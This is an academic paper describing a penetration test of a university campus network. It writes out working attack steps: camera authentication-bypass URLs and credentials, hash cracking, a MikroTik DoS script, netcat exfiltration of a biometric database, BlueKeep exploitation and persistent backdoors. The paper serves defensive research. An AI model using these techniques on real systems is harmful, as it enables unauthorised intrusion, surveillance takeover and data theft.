Case Study: Intranet Penetration Testing of MUET

2 nd International Conference on Computational Sciences and Technologies, 17-19 December 2020 (INCCST 20), MUET Jamshoro Case Study: Intranet Penetration Testing of MUET Shameel Syed Shameel_uddin@yahoo.com Faheem Khuhawar faheem.khuhawar@faculty.muet.edu.pk Khizra Arain khizra.ashraf11@gmail.com Talha Kaimkhani Zohaib Syed zohaib.hussainj111@gmail.com Hasan Sheikh Shahroz Khan Abstract Every organisation with its available resources requires its network to be secure from any sort of internal or external threats. This requires implementation and proper assessment of overall security measures. In this paper, we highlight how educational campus intra-network can be highly vulnerable due to improper configurations or inadequate security measures. Our investigation through penetration testing has allowed us to gain access of more than 50% of distribution and core switches from Cisco, IP cameras from Dahua and Hikvision, Bio-metric Systems from ZKTeco, MikroTik RouterOS, and PCs/Serves having vulnerabilities like BlueKeep. Systematic procedure is presented in this paper to perform the attacks along with the recommendations to implement proper security measures. Keywords Network Security; Penetration Testing; Testing; Exploitation; Attacks I. INTRODUCTION If vulnerability is utilized by an unauthorized individual to access a company s network, its resources can be compromised. The objective of a penetration test is to address vulnerabilities before they can be exploited. Penetration testing is a comprehensive method to test the complete, integrated, operational tests that consists of hardware, software and people. There are three main types of penetration testing namely, black hat penetration testing, white hat penetration testing and grey hat penetration testing. Black hat penetration testing scans the remote hosts for possible vulnerabilities with no prior knowledge of target, analyzes the vulnerabilities and their possible risk, and finally report them. White hat penetration testing is provided with a significant knowledge of the target. It is a simulation of an attack by a penetration tester who is having a detailed knowledge of the network environment. Grey hat penetration testing, also called gray box analysis, is a strategy in which the tester has limited knowledge of the internal details of the network. Gray hat approach is used when specifically, the threat of the attack is considered to be an inside job. We have used Grey Hat Approach in our research. Penetration testing has 4 steps to perform. Reconnaissance/ Information Gathering Scanning Exploitation Post exploitation Network scanning is a procedure for identifying devices on a network by employing features in the network protocol to signal devices and wait for a response. Most network scanning is used in monitoring and management, but scanning can also be used in identifying network elements or users for attacks. Exploitation is a piece of a software, a sequence of commands or a chunk of data that usually takes advantage of bug or vulnerability to cause unintended things or unintended behavior to occur on target machines. Such unintended behaviors include features like gaining control of a system, allowing privilege escalation or Denial of Services (DoS) attacks. Most devices connected to the Internet these days are not maintained and monitored properly. Instead, these are devices that are often not understood as computers but are termed as things, giving rise to the term, Internet of Things. II. Literature Review A penetration test is defined as a controlled attempt of penetrating into a network from outside in order to detect vulnerabilities [1]. In this age of continuously advancing technologies, every organization whether it be a university, a ISBN-978-969-23372-1-2 114

hospital or military organization is network based. This makes work-related tasks more efficient and effective but also increases their risk of being targeted by a malicious threat either for any agenda or for personal gain. This is where penetration testing is important. Offensive security techniques are used in order to discover possible flaws in the network. For an IoT company, it can be said as an act of complimenting the defensive security measures before IoT motes are deployed [2]. It is a basic instinct of a security expert to think like a criminal in order to fill the gaps from criminals perspective. So, it is a basic necessity for the penetration tester to know as much as or more than what an attacker can know, in order to make the results meaningful [3]. Wireless connections are low cost and convenient for connecting network devices. The simplicity with which it gives connection is also a reason for attackers to target wireless network. Therefore, authentication protocols have been made for keeping unauthorized access out of the network. The two most commonly heard encryption schemes for wireless networks are Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access (WPA). The WEP algorithm was made to secure wireless internet connections in 1997, but it was vulnerable on many levels [4]. So WPA was developed as a second encryption standard which solved many problems lying in WEP. The latest version of WPA is WPA2. WPA2 provides stronger encryption than that of WPA rated standard [5]. Both gives the choice of two security modes, i.e., TKIS and AES encryption modes. WPA2-PSK protocol can be used in a wireless distribution system. For home users, WPA2PSK (AES Pre Shared Key) is used. The corporate security is based on 802.1X, the EAP authentication framework that uses a RADIUS, such as EAP-TLS, which provides a much stronger authentication system, and secure key distribution [6]. The greatest attack that engraved its name recently is WannaCry. WannaCry is a type of a ransomware; a ransomware is a type of malware that takes full control of the targeted system and demands ransom for the safe return of the functionality of the system. WannaCry is a software that make use of Eternal Blue and Double Pulsar. It started on May 12, 2017. Eternal Blue is a well-known vulnerability in the Server Message Block (SMB) protocol employed by Microsoft Windows operating the ports 445 and 139. Once the malware is injected in the machine, it searches for backdoor. WannaCry malware spread to over 300,000 systems in over 150 countries [7]. There was only one agenda of WannaCry, to collect ransom. It froze or completely locked down the target systems by placing an encryption and demanded about $300$600 to release the lock. CCTV cameras, that are the very eyes of an organization and keep security in check, can also be exploited. A cyber-attack on a Russian bank gave hackers access to 24,000 CCTV cameras in 30 different countries. This attack led the bank to lose more than 31 million USD. [8] Recently, a new vulnerability released in Microsoft s RDP service which is considered to be as dangerous as EternalBlue. This paper also illustrates the exploitation and safety measures of this vulnerability. According to the estimation provided by US Computer Emergency Response Team (Cert), almost 40 percent of IT security breaches are perpetrated by people inside the company. Additionally, FBI/CSI Risk Assessment implied that many enterprises ports are opened, and any laptop can plug into the network and gain access as a common practice. The total loss of the companies surveyed was approximately over 130 million USD with average expenditure per employee being about 241 million USD per year. 28 percent of the employees stated they had no idea if they were attacked and how many times they were attacked. Yet about 32 percent of employees said they were never attacked from the inside. This paper deals with the penetration test procedure for determining the security levels so as to highlight the possible vulnerabilities that could be exploited in the Campus Area Network (CAN) of Mehran University of Engineering and (MUET) including the IP cameras, Biometric systems, and switches deployed within the network. This paper explains various data link protocols that have been compromised during the research. Although, a lot of work has been done in the area of penetration testing, we have specifically followed standard penetration testing on the live network of Mehran University of Engineering and using Gray Hat approach. III. METHODOLOGY Network Penetration testing has following four steps. A. Reconnaissance Reconnaissance is the process of collecting information about the target without being discovered, and use that information to perform a detailed penetration test. Reconnaissance is the biggest phase any penetration tester goes through to identify devices on the network and their interconnection. Generic topology of campus area network is shown in Figure 1 that is gained through survey and later verified. Fig. 1: Network Diagram of Campus Area Network To gain basic information about DHCP, DNS and subnet IP address, following commands were used. 115

username@hostname: $ ifconfig It was found that subnet IP changed with the change of departments, i.e., every department at MUET has different subnet ID, and DHCP was part of it. Whereas, the local DNS information remained same. ICMP (ping) messages were sent from one department to another, as a result of which it was realized that tagged information was being sent along with a VLAN ID. Using this approach, information about VLANs of different departments were collected. Later, this information was verified after discovering misconfigured switches that allowed unauthenticated bypass, if first two or three sessions via telnet protocol are maintained beforehand, whereas fourth session allows an attacker to enter the switch without prompting for any password. username@hostname: $ telnet 172.16.X.X This allowed Cisco IOS shell to be enabled, and eventually configuration file can be read, through which complete toplogy of MUET s network can be discovered, i.e., how core, aggregation, distribution, and access switches are interconnected with one another. Furthermore, additional information, such as rules of ACL and configuration of L2 protocols such as CDP, VTP, STP, and DTP, was also collected. B. Scanning The process of Scanning identifies security weaknesses in remote target network or local hosts. To achieve this, IP address information of live hosts and layer-2 devices was collected. Later, targeted hosts were scanned for open ports using a tool called nmap. username@hostname: $ nmap -T4 -A -v By this approach, tables of hosts with IP addresses and their corresponding MAC addresses along with open ports were made. Due to VLANs restriction, initially, the scan was being done on each VLAN separately. Later on, after the exploitation of core switch, detailed information was retrieved quickly and without any exhaustion. C. Exploitation 1) Switches: The switches with open Telnet ports were targeted, after a care-full review of scanning results. Upon attempting to access switches, it was discovered that more than 50% switches used default credentials, irrespective of their vendors. Switches that had their default passwords changed, were misconfigured, such as using vty 0 4, allowing accessing to switch after 5 simultaneous virtual connection sessions. Figure 2 shows snapshot of accessing the core switch. Fig. 2: Accessing Core Switch It was discovered that Cisco IOS Shell was enabled, through which configuration files of all of the core switches could be copied. From these configuration files, intensive information that helped in exploiting various L2 protocols was gathered. Hash password of users having privilege level of 15 and password to enter global configuration mode of the switch can also be retrieved from the configuration file which was later on cracked with the help of hashcat 1. This paper demonstrates the use of hashcat from Windows OS. Assuming that hashcat is installed in C drive, following command was used to brute-force the password, while assuming that the password consisted of 6 characters, where crack.txt is the name of the files which stores hashes of Cisco Type 5. The output of hashcat is shown in Figure 3. C:\hashcat>hashcat64.exe -a 3 -m 500 crack.txt?a?a?a?a?a?a Switches with Cisco IOS are by default allowed to write data into flash storage, this was further exploited to write malicious code and somehow trigger it to spread the malware throughout the network. Figure 4 demonstrate the proof of writing and adding a text file into the core switch. All of the files in flash storage of the switch can be seen and the configuration file can be read using cat command. Fig. 3: Hashcat Fig. 4: Writing data into the flash storage of core switch Linksys switches have been exploited through a vulnerability, called The Moon. This vulnerability can be exploited through Metasploit or Routersploit. Figure 5 demonstrates how it is done. 1 The tool hashcat needs to be installed first on the PC (Linux or Windows). 116

Fig. 5: Exploitation of Linksys switches Remote network connection is a basic necessity for the management of enterprise networking devices. Accessing routers and switches on daily basis for tasks such as, creating and removing VLANs, adding or removing interfaces. The access to the router/switch is done via either Telnet or Secure Shell (SSH). Using Telnet is rather common even if it is an insecure way. It is highly recommended that SSH be used instead of Telnet. 2) Routers: It was discovered that the currently deployed router on the campus was running MikroTik Router OS 42.9. An easier approach was carried out in which a preinstalled tool called searchsploit was utilized in order to find the vulnerabilities of the vendor MikroTik. Figure 6 shows that MikroTik RouterOS v6.42.9 is vulnerable for the following defined version. To exploit, following command was used. cat /usr/share/exploitdb/exploits/hardware/remote/46444.txt Furthermore, DoS attack defined in the exploits as searched by Searchsploit can be performed on MikroTik RouterOS using following command. python /usr/share/exploitdb/exploits/hardware/dos/18817.py 172.16.X.X config 9 3) IP Cameras: Organizations pay no attention to security vulnerabilities before purchasing and deploying CCTV cameras. Our investigation led us to exploit IP cameras from different vendors, most of the vulnerabilities of these devices Fig. 6: Searching Exploits by Searchsploit are well documented, yet they were still not patched. We demonstrate how easy it was to gain access into the CCTV system using brute-force attack via a tool called Hydra. Figure 7 demonstrates how Hydra is used. Fig. 7: Dictionary Attack on IP Cameras From those IP Cameras, database was extracted but the passwords were encrypted using the proprietary algorithm of the company. Hash passwords were extracted from the database and those hashes were put to access cameras from Hikvision. This allowed access to camera directly, suggesting poor implementation from Hikvision and a vulnerability of these cameras. Another downside of using IP cameras on intranet is that the passwords have to be hashed offline, which means that the algorithm must be somewhere in the system. After exploring the camera, algorithm was found to be in sofia.py. Figure 8 demonstrates how this algorithm converts 888888 to hash. Fig. 8: Hashing Algorithm Afterwards, a script was written to perform brute-force attack to find the passwords of the registered users and thus access was gained on different cameras which were not accessible via Telnet. It was found out that Hikvision and Dahua use the same algorithm to convert plain-text into hash. The database from some of the cameras was compromised due to the existence of backdoor in the camera using these different links on different cameras: http://<ip>:<port>/mnt/mtd/config/account1 http://<ip>:<port>/mnt/mtd/config/password http://<ip>:<port>/currentconfig/passowrd After Dahua noticed that hackers have been accessing cameras by default usernames and passwords, they gave a patch that disabled the telnet access. However, disabling the remote access turned out to be a much bigger obstacle for users to access IP cameras than it was thought, because in case usernames and passwords were forgotten, there was no way to access the cameras. To cope with that situation, Dahua gave a script to access cameras through telnet. http://<ip>:<port>/cgi-bin/configmanager.cgi?action= setconfig&telnet.enable=true After entering the script, a username and password is asked. But before the password, a string 7ujMko0 had to be added. For example, if username and password is admin, so password has to be provided like: 7ujMko0admin. Recovered passwords retrieved from previous methods were utilized with this string, and it also let default credentials open the telnet door of various cameras. In some cameras of Hikvision, entering following script into the browser allows an attacker to bypass authentication. http://<ip>:<port>/security/users?auth=ywrtaw46mtek 117

Worst part is that, by using this method, configuration file of Hikvision cameras can also be downloaded. http://<ip>:<port>/system/configurationfile?auth= YWRtaW46MTEK This configuration file contains usernames and passwords (in plain-text) for all configured users. Files are encrypted but encryption is easily reversible because of the presence of a static encryption key which is derived from the password abcdefg. http://<ip>:<port>/onvif-http/snapshot?auth=ywrtaw46mtek Above script allows the attacker to take a snapshot from the IP camera as it can be seen in Figure 9. Fig. 10: Software based on this vulnerability Fig. 9: Snapshot Taken by Entering Script This vulnerability also allows an attacker to change the password of the IP cameras of Hikvision very easily as it can be demonstrated in Figure 10. There is a protocol, Onvif, which was enabled on majority of the cameras and it was left unprotected due to the lack of knowledge of this protocol. Through this protocol, the use of the URL in a software like VLC Media Player allows access to the IP Cameras using default credentials. rtsp://<ip>:<port>/cam/realmonitor?channel=1&subtype=0& unicast=true&proto=onvif Onvif Device Manager can be used to manage the cameras in which this protocol is enabled. This allow to add/delete users, change the movement of the camera, speak into the camera, changing DNS server, changing NTP server and other features as well. The snapshot of using Onvif to access IP cameras is shown in Figure 11. Fig. 11: Accessing cameras using ONVIF 4) Bio-metric Systems: Bio-metric fingerprint systems are used throughout the campus for the purpose of attendance of faculty members in the campus, and in some organizations, biometric systems are used as locks for doors. Penetration testing is done on two models of ZKTeco, uface800/id and iclock880-h/id. Linux Kernel embedded in these systems are ZM220, ZEM600 and ZEM800. Telnet door was enabled on these machines and default passwords were not changed due to which access was gained into the systems after performing brute-forcing with the use of probable wordlists. Figure 12 demonstrates accessing IP camera via telnet. Fig. 12: Accessing biometic via Telnet First, database file were searched using the following command. find -name *.db 118

It will search all the files in the system having extension.db, which denotes a database file. After navigating to that directory, a database file was transferred using a tool netcat. The command from sending side (ZEM220) was, nc 172.16.23.32 9999 < ZKDB.db 172.16.23.32 is the IP of the PC where file was required to be received but port 9999 had to be open on the PC that received the transferred file using the following command on the PC. nc -l -p 9999 > ZKDB Where, -l denotes that the port 9999 is opened to listen from the remote connection. sqlite or any other software can be used to view the transferred file. After making changes, the.db file was uploaded to system the same way it was downloaded, using the tool netcat. UDP Port 4370 of ZK5000-ZK9000 allows anyone to connect to the system without any proper authentication. Custom commands can be created and sent to the device through UDP port 4370 to download information. This can be confirmed using the tool called Scapy from Linux OS. Alternatively, proprietary software of this company is also available which uses this port to connect to the device without password. Although other versions of this software can be used to exploit this vulnerability, but this has been confirmed by employing the software ZKTeco 5.0 as shown in Figure 13. Fig. 13: Snapshot of ZKTeco 5.0 This shows that one device has been connected, without providing any password. Following actions can be performed with this software; 1) Add a user 2) Delete a user 3) Change privileges of users 4) Modify Attendance Logsheet, i.e., change time and nature of attendance This database can be decrypted to extract the fingerprints of the users registered in the device these extracted fingerprints then can be used against the user in various ways, i.e., impersonation, identity theft, etc. 5) Exploiting Vulnerabilities in an Operating System: In different networks of different organizations, there is a plethora of vulnerabilities to exploit varying in accordance to the users. Different vulnerabilities were discovered in scanning phase which have been exploited to gain access in various systems. One of the most common vulnerability to access the system is Eternal Blue which could be exploited easily through Metasploit framework. This paper focuses on following two vulnerabilities. Firstly, this paper demonstrate the exploitation of an old bug that has been present in Netatalk for a long time. Pea is a proof of concept which bypasses authentication to gain control of execution flow of Netatalk as shown in Figure 14. This vulnerability has been patched in 3.1.10. Further details of this explanation can be found on the website of NIST by searching for CVE-2018-1160. Fig. 14: Exploitation of Netatalk 3.1.10 Secondly, this paper explains the exploitation of a vulnerability which is a hot topic these days. Bluekeep (CVE2019-0708) is a recently found vulnerability that has been discovered in RDP service of Microsoft. This is a wormable vulnerability which can be considered as dangerous as EternalBlue. After being exploited, this vulnerability provides an attacker with complete access on host s system. From scanning phase, information was gathered to know which hosts are using RDP Service of Microsoft. Following text demonstrates further scanning it with the module of Metasploit, to evaluate how many of the hosts are vulnerable to Bluekeep vulnerability. msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set RHOSTS 172.16.100.3 172.16.100.5 172.16.100.6 172.16.100.7 172.16.100.8 172.16.100.9 172.16.100.10 172.16.100.11... RHOSTS => 172.16.100.3 172.16.100.5 172.16.100.6 172.16.100.7 172.16.100.8 172.16.100.9 172.16.100.10 172.16.100.11... msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run [*] 172.16.100.3:3389 - The target is not exploitable. [*] 172.16.100.4:3389 - The target is not exploitable. [*] Scanned 2 of 18 hosts (11% complete) [+] 172.16.100.5:3389 - The target is vulnerable. [*] 172.16.100.7:3389 - The target is not exploitable. [*] Scanned 4 of 18 hosts (22% complete) [+] 172.16.100.11:3389 - The target is vulnerable.... Since metasploit recently launched the module for exploiting Bluekeep, the module had to be manually added. wget https://github.com/rapid7/metasploit-framework/raw/ edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/ exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb mv cve_2019_0708_bluekeep_rce.rb /usr/share/metasploitframework/modules/exploits/windows/rdp/ After that, open metasploit and run the following command, reload_all 119

set RHOST target and launch the attack. After the attack was done, a meterpreter shell was provided through which complete access over victim s PC was gained as it can be seen in Figure 15. Fig. 15: Exploiting Bluekeep Other than exploiting devices as a whole, this work also focuses on exploiting protocols of data-link layer in TCP/IP suite. The main purpose to build TCP/IP suite was to ensure that different layers work without the knowledge of each other. But unfortunately, this means that if any one layer of TCP/IP suite is attacked, other layers will not get any idea of the problem. In networking, layer-2 is a very weak link and prone to attacks. Following layer-2 protocols have been compromised namely, ARP, VTP, STP, and DTP. 6) ARP Spoofing: ARP is used to discover MAC address associated with given IP address. A client can send an unsolicited reply which is called a gratuitous ARP, and other hosts can save that information in their ARP tables in the same subnet. This way, anyone can claim to have any IP/MAC address. This is how ARP attacks redirect traffic. There are certain countermeasures to ARP spoofing attacks, such as using DHCP snooping binding table, in which it is necessary for all ARP packets to match the binding table entries or else the ARP packets will be discarded. This is done when dynamic ARP inspection is enabled. In the network under consideration, DHCP Snooping is enabled but there is a Proxy Server deployed in the network which authenticates each time a request is sent. Since the Proxy server is using HTTP protocol, then by poisoning the whole VLAN, usernames and passwords of clients can be retrieved. MITMF v0.9.8 tool is used to demonstrate the procedure as shown in Figure 16. The example demonstrates ARP poison by setting gateway address and target range. Fig. 16: ARP Spoofing using MITMF 7) DTP Attack: On a switch, a port is configured in two ways. Either as an access port or as a dynamic port. When a host is connected to a switch, an access port is used. With VLAN implementation, each access port is assigned to only one VLAN. On the contrary, a trunk port allows the traffic of multiple VLANs to pass through. A trunk port can be configured via a Cisco propriety protocol called Dynamic Trunking Protocol (DTP). DTP automates the IEEE 802.1x/ISL Trunk configuration. It does not operate on routers. Synchronization of trunking mode on end links is done by the DTP. DTP state on trunking port can be set to Auto, On, Off, Desirable, or Non-Negotiate. In switch spoofing attack, the attacker impersonates as a switch in order to trick a legitimate switch into creating a trunking link between them. As already mentioned, any VLAN s packets are allowed to pass through the trunking link. Upon establishment of the link, traffic from any VLAN can be accessed by an attacker. The chance of success of this exploit depends solely on the fact that the legitimate switch is configured as Dynamic Desirable, Dynamic Auto or Trunk mode. Since the switches under consideration were configured as Auto, so a switch spoofing attack was performed using the tool Yersinia v0.8.2 as shown in Figure 17, and thus a trunk link was formed. Fig. 17: DTP attack using Yersinia It can be clearly seen that, access port was assigned and then it turned into trunk link after a successful DTP attack. This attack also provides a way for VLAN hopping attack / double Encapsulation attack. This attack can be prevented by manually assigning each port as an access or trunk port. Further security 120

measures include using a different VLAN other than default VLAN as a Native VLAN. 8) VTP Attack: Switches are added to a VTP domain for them to use VTP. This VTP domain is defined in a VTP server, and later clients and transparent devices as well. Whenever a new VLAN is added/created in a VTP server, the VTP server will automatically distribute this information among all the switches present in the VTP domain. All the switches (except the VTP server) are defined as client switches, and their task is to listen to the changes regarding VLANs by the VTP server. Switches that are configured transparent, without altering their VLAN assignments, will simply forward the VTP information. This is really useful when there are a lot of switches involved in the network. Since all VLAN information can simply be altered from any place and automatically be changed due to VTP server. On the other hand, some risks are involved that an attacker could exploit that usefulness by creating a rogue VTP server and gain complete control over the VTP domain VLANs. To remedy that, VTP implements MD5-based authentication in the VTP frames. In MD5 authentication, VTP server has a password for authenticating the VTP domain switches, without that password switches will not authenticate VTP information. Password is sent in MD5 hash. This hash is then verified and used by the client switch. There are mainly two facts to consider when injecting VTP frames. The port should be turned into a trunk by the attacker (via DTP attack), and the VTP configuration revision number should be higher than the previous advertisements of VTP for recent update reflection. By adding or deleting the VLANs via a rogue VTP server, a VTP attack is done. when there is a need to make changes. Other switches are secondary by default which secures the network from this attack. 9) CDP Attack: The Cisco Discovery Protocol (CDP) is another propriety protocol of Cisco used by all devices by default. Directly connected devices are discovered using CDP, to simplify their configuration and connectivity. There is no maintained encryption in CDP messages. Information of CDP is broadcasted periodically, updating each device s CDP database. Routers cannot propagate it because CDP is a layer 2 protocol. Information of network devices such as software version, IP address, capabilities, platform, interfaces and the native VLAN information are gathered up in CDP. Ultimately, whole network s topology could be determined using CDP and if it gets into an attacker s hand, this information could be used to exploit the network in many ways, mainly in the form of a Denial of Service (DoS) attack. Attacker can get CDP information via Wireshark or other network analyzer tool to sniff out the broadcast messages sent by the CDP. For example, if attacker gets to know the Cisco IOS version of the device as shown in Figure 19. This information is enough to search for exploits in that particular version. The attacker can also send malicious or bogus CDP packets to the directly connected Cisco devices, which can cause the switch to utilize its CPU to a maximum of 100%. CDP is a useful protocol when documentation of a network is being made and in most cases CDP is enabled on every switch and port in the network. Fig. 19: CDP Fig. 18: VTP Information A rogue VTP server can be made on any switch by increasing the revision number from the previous one (previous revision number was known by viewing VTP information in core switch as shown in Figure 18), after sending the command to change VLAN configurations via rogue VTP server, the MD5 hash was sent with that frame and there were no qualms in accepting that malicious frame since the hash was authenticated. This was done using the tool Yersinia. It is important to know that exploitation of MD5 hash was possible because switches were configured with VTP Version 2. The remedy of that is to implement VTP Version 3. VTPv3 uses status made up of primary and secondary VTP servers. Primary status is used only 10) STP Attack: Spanning Tree Protocol (STP) is used to avert the loops being formed on layer-2 switches or bridges network with multiple paths for redundancy reason. Switches are made aware of each other and the bandwidths of links being used between them. The switches can then select a path that is both loop-free and with maximum possible bandwidth in the network. The decision of choosing the link is based on STP path cost. There is a reference point to control the STP called Root Bridge. The root of STP is selected from the switches via Election Process. All the traffic goes through root bridge. Subsequent to the election of root bridge, a root port is elected that has the shortest STP path cost to the root bridge. After that, designated ports for each segment of network are selected. All the STP attacks differ based on the modification of one or more fields of BPDU frames. After sniffing existing legitimate BPDUs and taking their settings into account, the most dangerous attack type would be presenting a machine under 121

your control as the Root Bridge, so that all the traffic in the STP topology should go through the attacker. STP BPDUs should not propagate through access ports, but such BPDUs were accepted due to misconfiguration. Knowing the bridge priority from the reconnaissance phase (via core switch), bridge priority of a switch chosen from the network was changed to be lower than the root switch, thus making that switch the root bridge which enabled the whole data to be sniffed. Above mentioned attack (called root role attack) can be thwarted by Root Guard and BPDU-guard, which were not enabled here. Secondly, STP DoS attack was also performed by sending thousands of packets per second with the help of Yersinia. The switch processed so many config BPDU packets which kept on constantly changing the root bridge within the STP topology, rendering STP confused. Thirdly, another DoS attack was performed in which TCN BPDUs were sent to the root bridge which caused the STP topology to change continuously. BPDU filtering can be used to mitigate both above mentioned DoS attacks. 11) DHCP Starvation: DHCP protocol is an integral component, the function of which is the configuration of client machines with IP addresses and other information such as subnet mask, DNS address and default gateway. DHCP starvation is an attack that targets DHCP servers in which malicious DHCP requests are made to exhaust the IP pool of all the available IP addresses. As a result, proper network users get DoS. DHCP Starvation can be launched even with a minimal bandwidth [9]. In our attack, it can be seen in Figure 20, DHCP Release Message is sent as broadcast in the VLAN to release IP addresses of the users, followed by immediately sending DHCP Request Message to completely exhaust the IP pool of the DHCP server. Fig. 20: DHCP Attack Afterwards, DHCP Rogue Server can be created to assign IP addresses through our system and then perform ManIn-The- Middle attack on the victims who have obtained IP addresses through rogue DHCP. D. Post Exploitation The purpose of this phase is to create a alternate way to get into the system so that the accessibility to compromised systems remain intact. For that, backdoors were created and then deployed on compromised IP Cameras and Biometric systems. In bio-metric systems, persistent backdoor was created via netcat tool. However, different vendors of IP Cameras (or even some bio-metric systems) do not support netcat tool, so in order to create persistent backdoors in such systems, tools like ShellPop or TheFatRat can be used. IV. CONCLUSION Securing the network of an organization requires penetration testing. This helps to identify vulnerabilities which can be exploited for malicious intentions. Network administrator should be aware of the security aspect of different protocol configurations on networking device. This awareness helps employees to avoid internal, external, and social engineering attacks on network. Moreover, a well thought out security policy which lines in with the organization s need is rather a very important factor when deploying a network. The following step must be taken to mitigate the threats as outlined in this research paper. (1) Change the default credentials of all the protocols configured in a network. And for the devices which allow unauthenticated access shouldn t be allowed remote access. Alternatively, a restricted access should be allowed to authorized users by deploying specific security policies. (2) Configure port security to prevent DHCP starvation attack. (3) Enable DHCP snooping feature will prevent Rogue DHCP Server attacks. (4) ARP attacks can be prevented by Dynamic ARP Inspection (DAI). (5) IP/MAC spoofing can be prevented using IP source guard (IPSG) feature. (6) SSH should be used instead of Telnet to configure network devices remotely as Telnet establishes a session where information flows in plain text which can be easily sniffed via Wireshark or any other sniffing tool. (7) Passwords must be set for all VTY sessions and not just for the first three or four sessions otherwise attacker can exploit this to attack a network. (8) Port security should be enabled on all the active interfaces (access port) of switch and all unused port should be shut down to avoid unauthorized access. (9) IDS or ARP inspection prevents ARP attack. (10) For prevention of attacks related to STP, BPDU-guard and Root-guard feature should be enabled. (11) Use VTP version 3 to fend off against VTP attacks. (12) Use CDP only when it is necessary. REFERENCES [1] S. Turpe and Jrn Eichler. Testing production systems safely: Common precautions in penetration testing. pages 205 209, 10 2009. [2] Chung-Kuan Chen, Zhi-Kai Zhang, Shan-Hsin Lee, and Shiuhpyng Shieh. Penetration testing in the iot age. Computer, 51:82 85, 04 2018. [3] Bishop Matt. About penetration testing. IEEE Security and Privacy, 5(6):84 87, 2007. [4] Erik Tews and Martin Beck. Practical attacks against wep and wpa. In Proceedings of the second ACM conference on Wireless network security, 122

pages 79 86. ACM, 2009. https://dl.acm.org/citation.cfm?id=1514286, last accessed on 2019-09-30. [5] Joseph Mwangi, Dr. Wilson Cheruiyo, and Dr. Michael Kimwel. Security analysis of wpa2. Control Theory and Informatics, 5, 2015. https://pdfs. semanticscholar.org/bbd9/af99e0ff0a1df675d4dbac81b8d815999869.pdf, last accessed on 2019-09-30. [6] Arash Habibi Lashkari, Mir Mohammad Seyed Danesh, and Behrang Samadi. A survey on wireless security protocols (wep, wpa and wpa2/802.11 i). In 2009 2nd IEEE International Conference on Computer Science and Information, pages 48 52. IEEE, 2009. https: //ieeexplore.ieee.org/abstract/document/5234856, last accessed on 201910-12. [7] Ashok Koujalagi, Shweta Patil, and Praveen Akkimaradi. The wannacry ransomeware, a mega cyber attack and their consequences on the modern india. International Journal of Information, 6(4):1 4, apr 2018. [8] Mohammed Farook Bin Rafiuddin, Prethpal Singh Dhubb, and Hamza Minhas. Recent study of close circuit television (cctv) in hacking. International Journal of Advance Research in Science and Engineering, 6(4):551 561, apr 2017. [9] N. Tripathi and N. Hubballi. Exploiting dhcp server-side ip address conflict detection: A dhcp starvation attack. In 2015 IEEE International Conference on Advanced Networks and Telecommuncations Systems (ANTS), pages 1 3, Dec 2015. 123